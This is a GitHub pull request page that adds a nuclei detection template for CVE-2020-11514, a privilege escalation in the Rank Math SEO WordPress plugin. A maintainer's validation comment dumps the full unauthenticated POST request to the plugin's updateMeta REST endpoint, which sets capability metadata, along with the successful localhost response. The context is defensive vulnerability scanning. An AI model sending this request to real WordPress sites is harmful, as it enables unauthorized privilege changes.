Skip to content

add CVE-2020-11514 (vKEV)#13268

Merged
pussycat0x merged 2 commits intomainfrom
unknown repository
Sep 16, 2025
Merged

add CVE-2020-11514 (vKEV)#13268
pussycat0x merged 2 commits intomainfrom
unknown repository

Conversation

@ghost
Copy link
Copy Markdown

@ghost ghost commented Sep 15, 2025

i send mail for vuln ins and debug data

I've validated this template locally?

  • YES
  • NO

Additional Details (leave it blank if not applicable)

Additional References:

@DhiyaneshGeek DhiyaneshGeek added the Done Ready to merge label Sep 15, 2025
@DhiyaneshGeek
Copy link
Copy Markdown
Member

DhiyaneshGeek commented Sep 15, 2025

Validated Locally

LGTM !

nuclei -u http://localhost:8080 -t test.yaml -debug -vv

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.10

		projectdiscovery.io

[INF] Current nuclei version: v3.4.10 (latest)
[INF] Current nuclei-templates version: v10.2.8 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 114
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[CVE-2020-11514] Rank Math SEO <= 1.0.40.2 - Privilege Escalation via Unprotected REST API Endpoint (@s4e-io) [critical]
[INF] [CVE-2020-11514] Dumped HTTP request for http://localhost:8080/wp-json/rankmath/v1/updateMeta

POST /wp-json/rankmath/v1/updateMeta HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Knoppix; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36
Connection: close
Content-Length: 140
Content-Type: application/json
Accept-Encoding: gzip

{
  "objectID": "1254820732",
  "objectType": "32krIBfjvYhAOmwkM5wslhDkjKM",
  "meta": {
    "rank_math_capabilities": ["ungdl"]
  }
}
[DBG] [CVE-2020-11514] Dumped HTTP response http://localhost:8080/wp-json/rankmath/v1/updateMeta

HTTP/1.1 200 OK
Connection: close
Content-Length: 4
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Allow: POST
Content-Type: application/json; charset=UTF-8
Date: Mon, 15 Sep 2025 22:28:49 GMT
Link: <http://localhost:8080/wp-json/>; rel="https://api.w.org/"
Server: Apache/2.4.38 (Debian)
X-Content-Type-Options: nosniff
X-Powered-By: PHP/7.4.13
X-Robots-Tag: noindex

true

@DhiyaneshGeek DhiyaneshGeek changed the title add CVE-2020-11514 vkev add CVE-2020-11514 (vKEV) Sep 15, 2025
@pussycat0x
Copy link
Copy Markdown
Contributor

pussycat0x commented Sep 16, 2025

hello @halil-s4e ,Thank you for sharing this template with the community and for your contribution to this project.

@pussycat0x pussycat0x merged commit d4a766e into projectdiscovery:main Sep 16, 2025
3 checks passed
@algora-pbc
Copy link
Copy Markdown

algora-pbc Bot commented Sep 16, 2025

🎉🎈 @halil-s4e has been awarded $200 by ProjectDiscovery! 🎈🎊

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Reviewers

No reviews

Assignees

@DhiyaneshGeek DhiyaneshGeek

Labels

Done Ready to merge 💰 Rewarded

Projects

None yet

Milestone

No milestone

Development

Successfully merging this pull request may close these issues.

3 participants

@DhiyaneshGeek @pussycat0x @ritikchaddha